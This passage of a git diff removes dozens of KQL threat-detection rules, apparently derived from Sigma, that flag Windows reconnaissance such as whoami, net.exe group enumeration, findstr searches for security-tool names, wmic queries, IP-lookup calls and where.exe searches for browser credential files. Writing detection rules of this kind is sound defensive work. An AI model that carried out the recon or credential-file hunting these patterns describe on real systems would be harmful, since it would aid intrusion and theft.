"whoami.exe /all | findstr "
\ No newline at end of file
diff --git a/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
deleted file mode 100644
index 6b0bdff3..00000000
--- a/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/19
-// Level: medium
-// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
-// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592
-DeviceProcessEvents
-| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe")))
\ No newline at end of file
diff --git a/Discovery/Renamed_Whoami_Execution.kql b/Discovery/Renamed_Whoami_Execution.kql
deleted file mode 100644
index a0f2b785..00000000
--- a/Discovery/Renamed_Whoami_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/12
-// Level: critical
-// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "whoami.exe" and (not(FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql b/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql
deleted file mode 100644
index 7cd541b4..00000000
--- a/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/05
-// Level: high
-// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql b/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql
deleted file mode 100644
index 8d531a86..00000000
--- a/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023/10/20
-// Level: medium
-// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
-This detection focuses on the keywords that the attacker might use as a filter.
-
-// Tags: attack.discovery, attack.t1518.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " avira" or ProcessCommandLine endswith " avira\"" or ProcessCommandLine endswith " cb" or ProcessCommandLine endswith " cb\"" or ProcessCommandLine endswith " cylance" or ProcessCommandLine endswith " cylance\"" or ProcessCommandLine endswith " defender" or ProcessCommandLine endswith " defender\"" or ProcessCommandLine endswith " kaspersky" or ProcessCommandLine endswith " kaspersky\"" or ProcessCommandLine endswith " kes" or ProcessCommandLine endswith " kes\"" or ProcessCommandLine endswith " mc" or ProcessCommandLine endswith " mc\"" or ProcessCommandLine endswith " sec" or ProcessCommandLine endswith " sec\"" or ProcessCommandLine endswith " sentinel" or ProcessCommandLine endswith " sentinel\"" or ProcessCommandLine endswith " symantec" or ProcessCommandLine endswith " symantec\"" or ProcessCommandLine endswith " virus" or ProcessCommandLine endswith " virus\"") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql b/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql
deleted file mode 100644
index 4dbec23f..00000000
--- a/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Endgame, JHasenbusch (ported for oscd.community)
-// Date: 2018/10/30
-// Level: low
-// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
-// Tags: attack.discovery, attack.t1018
-DeviceProcessEvents
-| where (ProcessCommandLine contains "view" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine contains "\\\\"))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Execution_of_Hostname.kql b/Discovery/Suspicious_Execution_of_Hostname.kql
deleted file mode 100644
index be1ee918..00000000
--- a/Discovery/Suspicious_Execution_of_Hostname.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: Use of hostname to get information
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where FolderPath endswith "\\HOSTNAME.EXE"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Execution_of_Systeminfo.kql b/Discovery/Suspicious_Execution_of_Systeminfo.kql
deleted file mode 100644
index e6aa3bdf..00000000
--- a/Discovery/Suspicious_Execution_of_Systeminfo.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: Detects usage of the "systeminfo" command to retrieve information
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where FolderPath endswith "\\systeminfo.exe" or ProcessVersionInfoOriginalFileName =~ "sysinfo.exe"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql b/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql
deleted file mode 100644
index 45d9b7ac..00000000
--- a/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
-Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
-
-// Tags: attack.discovery, attack.t1087.001, attack.t1087.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ((((ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto" or ProcessCommandLine contains " /do") and (ProcessCommandLine contains " group " or ProcessCommandLine contains " localgroup ")) and (not(ProcessCommandLine contains " /add"))) or (ProcessCommandLine contains " /do" and ProcessCommandLine contains " accounts "))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql b/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql
deleted file mode 100644
index 34357fc4..00000000
--- a/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/28
-// Level: high
-// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "syscall:::return" and ProcessCommandLine contains "lkd(") or (ProcessCommandLine contains "lkd(0)" and FolderPath endswith "\\dtrace.exe")
\ No newline at end of file
diff --git a/Discovery/Suspicious_Network_Command.kql b/Discovery/Suspicious_Network_Command.kql
deleted file mode 100644
index 1125f58f..00000000
--- a/Discovery/Suspicious_Network_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2021/12/07
-// Level: low
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// Tags: attack.discovery, attack.t1016
-DeviceProcessEvents
-| where ProcessCommandLine contains "ipconfig /all" or ProcessCommandLine contains "netsh interface show interface" or ProcessCommandLine contains "arp -a" or ProcessCommandLine contains "nbtstat -n" or ProcessCommandLine contains "net config" or ProcessCommandLine contains "route print"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql b/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql
deleted file mode 100644
index 2324716d..00000000
--- a/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/24
-// Level: medium
-// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
-// Tags: attack.discovery, attack.t1016
-DeviceNetworkEvents
-| where ((RemoteUrl in~ ("www.ip.cn", "l2.io")) or (RemoteUrl contains "api.2ip.ua" or RemoteUrl contains "api.bigdatacloud.net" or RemoteUrl contains "api.ipify.org" or RemoteUrl contains "bot.whatismyipaddress.com" or RemoteUrl contains "canireachthe.net" or RemoteUrl contains "checkip.amazonaws.com" or RemoteUrl contains "checkip.dyndns.org" or RemoteUrl contains "curlmyip.com" or RemoteUrl contains "db-ip.com" or RemoteUrl contains "edns.ip-api.com" or RemoteUrl contains "eth0.me" or RemoteUrl contains "freegeoip.app" or RemoteUrl contains "geoipy.com" or RemoteUrl contains "getip.pro" or RemoteUrl contains "icanhazip.com" or RemoteUrl contains "ident.me" or RemoteUrl contains "ifconfig.io" or RemoteUrl contains "ifconfig.me" or RemoteUrl contains "ip-api.com" or RemoteUrl contains "ip.360.cn" or RemoteUrl contains "ip.anysrc.net" or RemoteUrl contains "ip.taobao.com" or RemoteUrl contains "ip.tyk.nu" or RemoteUrl contains "ipaddressworld.com" or RemoteUrl contains "ipapi.co" or RemoteUrl contains "ipconfig.io" or RemoteUrl contains "ipecho.net" or RemoteUrl contains "ipinfo.io" or RemoteUrl contains "ipip.net" or RemoteUrl contains "ipof.in" or RemoteUrl contains "ipv4.icanhazip.com" or RemoteUrl contains "ipv4bot.whatismyipaddress.com" or RemoteUrl contains "ipv6-test.com" or RemoteUrl contains "ipwho.is" or RemoteUrl contains "jsonip.com" or RemoteUrl contains "myexternalip.com" or RemoteUrl contains "seeip.org" or RemoteUrl contains "wgetip.com" or RemoteUrl contains "whatismyip.akamai.com" or RemoteUrl contains "whois.pconline.com.cn" or RemoteUrl contains "wtfismyip.com")) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Query_of_MachineGUID.kql b/Discovery/Suspicious_Query_of_MachineGUID.kql
deleted file mode 100644
index 220d7db0..00000000
--- a/Discovery/Suspicious_Query_of_MachineGUID.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: Use of reg to get MachineGuid information
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Cryptography" and ProcessCommandLine contains "/v " and ProcessCommandLine contains "MachineGuid") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql b/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql
deleted file mode 100644
index 6dcb8c45..00000000
--- a/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/10
-// Level: medium
-// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
-// Tags: attack.discovery, attack.t1087.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Get-LocalGroupMember " and (ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto")
\ No newline at end of file
diff --git a/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 62278102..00000000
--- a/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Scan_Loop_Network.kql b/Discovery/Suspicious_Scan_Loop_Network.kql
deleted file mode 100644
index 19d4fbec..00000000
--- a/Discovery/Suspicious_Scan_Loop_Network.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/12
-// Level: medium
-// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
-// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018
-DeviceProcessEvents
-| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping")
\ No newline at end of file
diff --git a/Discovery/Suspicious_Use_of_PsLogList.kql b/Discovery/Suspicious_Use_of_PsLogList.kql
deleted file mode 100644
index b0aeb239..00000000
--- a/Discovery/Suspicious_Use_of_PsLogList.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: medium
-// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
-// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " security" or ProcessCommandLine contains " application" or ProcessCommandLine contains " system") and (ProcessCommandLine contains " -d" or ProcessCommandLine contains " /d" or ProcessCommandLine contains " -x" or ProcessCommandLine contains " /x" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " /c" or ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g") and (ProcessVersionInfoOriginalFileName =~ "psloglist.exe" or (FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe"))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Where_Execution.kql b/Discovery/Suspicious_Where_Execution.kql
deleted file mode 100644
index ac7bc0f8..00000000
--- a/Discovery/Suspicious_Where_Execution.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/13
-// Level: low
-// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
-Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
-internal network resources such as servers, tools/dashboards, or other related infrastructure.
-
-// Tags: attack.discovery, attack.t1217
-DeviceProcessEvents
-| where (FolderPath endswith "\\where.exe" or ProcessVersionInfoOriginalFileName =~ "where.exe") and (ProcessCommandLine contains "places.sqlite" or ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "formhistory.sqlite" or ProcessCommandLine contains "logins.json" or ProcessCommandLine contains "key4.db" or ProcessCommandLine contains "key3.db" or ProcessCommandLine contains "sessionstore.jsonlz4" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Login Data")
\ No newline at end of file
diff --git a/Discovery/Sysinternals_PsService_Execution.kql b/Discovery/Sysinternals_PsService_Execution.kql
deleted file mode 100644
index f02b57a4..00000000
--- a/Discovery/Sysinternals_PsService_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/16
-// Level: medium
-// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe")
\ No newline at end of file
diff --git a/Discovery/Sysinternals_PsSuspend_Execution.kql b/Discovery/Sysinternals_PsSuspend_Execution.kql
deleted file mode 100644
index fe4d7335..00000000
--- a/Discovery/Sysinternals_PsSuspend_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/23
-// Level: medium
-// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")
\ No newline at end of file
diff --git a/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql b/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql
deleted file mode 100644
index 8bbe1a9b..00000000
--- a/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/16
-// Level: high
-// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
-// Tags: attack.discovery, attack.t1518.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " 385201" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index e0972b4b..00000000
--- a/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Stephen Lincoln `@slincoln-aiq`(AttackIQ)
-// Date: 2024/02/02
-// Level: medium
-// Description: An adversary might use WMI to discover information about the system, such as the volume name, size,
-free space, and other disk information. This can be done using the `wmic` command-line utility and has been
-observed being used by threat actors such as Volt Typhoon.
-
-// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "volume" or ProcessCommandLine contains "path win32_logicaldisk") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql b/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql
deleted file mode 100644
index 6728dc2d..00000000
--- a/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/10
-// Level: low
-// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
-// Tags: attack.discovery, attack.t1049
-DeviceProcessEvents
-| where ((ProcessCommandLine endswith " use" or ProcessCommandLine endswith " sessions") or (ProcessCommandLine contains " use " or ProcessCommandLine contains " sessions ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql b/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql
deleted file mode 100644
index de756d78..00000000
--- a/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: TropChaud
-// Date: 2023/01/26
-// Level: medium
-// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
-including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
-and GPU driver products/versions.
-Some of these commands were used by Aurora Stealer in late 2022/early 2023.
-
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "LOGICALDISK get Name,Size,FreeSpace" or ProcessCommandLine contains "os get Caption,OSArchitecture,Version") and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/Discovery/Use_of_W32tm_as_Timer.kql b/Discovery/Use_of_W32tm_as_Timer.kql
deleted file mode 100644
index 4e1a4aef..00000000
--- a/Discovery/Use_of_W32tm_as_Timer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/09/25
-// Level: high
-// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism
-// Tags: attack.discovery, attack.t1124
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/stripchart" and ProcessCommandLine contains "/computer:" and ProcessCommandLine contains "/period:" and ProcessCommandLine contains "/dataonly" and ProcessCommandLine contains "/samples:") and (FolderPath endswith "\\w32tm.exe" or ProcessVersionInfoOriginalFileName =~ "w32time.dll")
\ No newline at end of file
diff --git a/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql b/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql
deleted file mode 100644
index e31beff7..00000000
--- a/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
-// Tags: attack.discovery, attack.t1033
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADUser " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/WhoAmI_as_Parameter.kql b/Discovery/WhoAmI_as_Parameter.kql
deleted file mode 100644
index f6fc51e8..00000000
--- a/Discovery/WhoAmI_as_Parameter.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/29
-// Level: high
-// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where ProcessCommandLine contains ".exe whoami"
\ No newline at end of file
diff --git a/Discovery/Whoami.EXE_Execution_Anomaly.kql b/Discovery/Whoami.EXE_Execution_Anomaly.kql
deleted file mode 100644
index 67453cb8..00000000
--- a/Discovery/Whoami.EXE_Execution_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/12
-// Level: medium
-// Description: Detects the execution of whoami.exe with suspicious parent processes.
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") and (not(((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") or InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) and (not(InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe"))
\ No newline at end of file
diff --git a/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql b/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql
deleted file mode 100644
index 35ff8ce9..00000000
--- a/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov
-// Date: 2022/01/28
-// Level: high
-// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller")
\ No newline at end of file
diff --git a/Discovery/Whoami.EXE_Execution_With_Output_Option.kql b/Discovery/Whoami.EXE_Execution_With_Output_Option.kql
deleted file mode 100644
index dfb76c22..00000000
--- a/Discovery/Whoami.EXE_Execution_With_Output_Option.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /FO CSV" or ProcessCommandLine contains " -FO CSV") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")) or ProcessCommandLine =~ "*whoami*>*"
\ No newline at end of file
diff --git a/Discovery/Whoami_Utility_Execution.kql b/Discovery/Whoami_Utility_Execution.kql
deleted file mode 100644
index 674c5dcc..00000000
--- a/Discovery/Whoami_Utility_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/08/13
-// Level: low
-// Description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe"
\ No newline at end of file
diff --git a/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
deleted file mode 100644
index 5a91ee73..00000000
--- a/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
-DeviceProcessEvents
